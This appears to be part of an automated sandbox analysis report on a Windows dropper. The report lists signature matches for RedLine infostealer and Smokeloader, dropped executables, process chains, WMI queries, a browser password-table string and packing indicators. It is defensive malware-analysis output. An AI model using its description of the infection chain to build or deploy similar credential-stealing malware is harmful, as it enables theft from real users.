                    Source: 1.2.twl97yF91.exe.4b10ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 14.0.uPD30tM82.exe.2b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.4b10ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.2f96cde.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000001.00000002.322292427.0000000002E68000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00861F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00861F90
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00863BA20_2_00863BA2
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00865C9E0_2_00865C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00408C601_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040DC111_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00407C3F1_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00418CCC1_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00406CA01_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004028B01_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004182441_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004016501_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402F201_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004193C41_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004187881_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402F891_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00402B901_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004073A01_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB2B171_2_02CB2B17
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB18B71_2_02CB18B7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB786D1_2_02CB786D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC89EF1_2_02CC89EF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB31F01_2_02CB31F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB31871_2_02CB3187
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB8EC71_2_02CB8EC7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB7EA61_2_02CB7EA6
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBDE781_2_02CBDE78
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB77D91_2_02CB77D9
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB6F071_2_02CB6F07
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCA7251_2_02CCA725
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC8F331_2_02CC8F33
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC84AB1_2_02CC84AB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB2DF71_2_02CB2DF7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_030520B91_2_030520B9
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_030520C81_2_030520C8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03051DAA1_2_03051DAA
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03051DB81_2_03051DB8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeCode function: 14_2_0260F36814_2_0260F368
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: String function: 02CBE43F appears 44 times
                    Source: W7ANVukbbj.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 294082 bytes, 2 files, at 0x2c +A "twl97yF91.exe" +A "uPD30tM82.exe", ID 2151, number 1, 18 datablocks, 0x1503 compression
                    Source: W7ANVukbbj.exe, 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exe, 00000000.00000003.255075633.0000000002E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVaccinium.exe< vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exe, 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVaccinium.exe< vs W7ANVukbbj.exe
                    Source: W7ANVukbbj.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs W7ANVukbbj.exe
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe F10032D8E8F46511F815FE1AA9B94C8D72D3923E0768E426A513B55CEA07E8E6
                    Source: W7ANVukbbj.exeReversingLabs: Detection: 71%
                    Source: W7ANVukbbj.exeVirustotal: Detection: 48%
                    Source: W7ANVukbbj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\W7ANVukbbj.exe C:\Users\user\Desktop\W7ANVukbbj.exe
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeJump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00861F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00861F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@0/1
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_0086597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0086597D
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00863FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00863FEF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00864FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00864FE0
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCommand line argument: Kernel32.dll0_2_00862BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCommand line argument: 08A1_2_00413780
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: W7ANVukbbj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: W7ANVukbbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb source: W7ANVukbbj.exe
                    Source: Binary string: wextract.pdbGCTL source: W7ANVukbbj.exe
                    Source: Binary string: ,C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
                    Source: Binary string: _.pdb source: twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000003.259177434.0000000002F0D000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeUnpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeUnpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_0086724D push ecx; ret 0_2_00867260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCC125 push ebx; ret 1_2_02CCC126
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCBE73 push cs; iretd 1_2_02CCBF49
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCBF75 push cs; iretd 1_2_02CCBF49
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBE484 push ecx; ret 1_2_02CBE497
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03055704 push edx; retf 1_2_0305570A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03055EFC push ebx; ret 1_2_03055EFD
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D
                    Source: uPD30tM82.exe.0.drStatic PE information: 0xB087F0D6 [Wed Nov 7 22:10:30 2063 UTC]
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeJump to dropped file
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeJump to dropped file
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00861AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00861AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
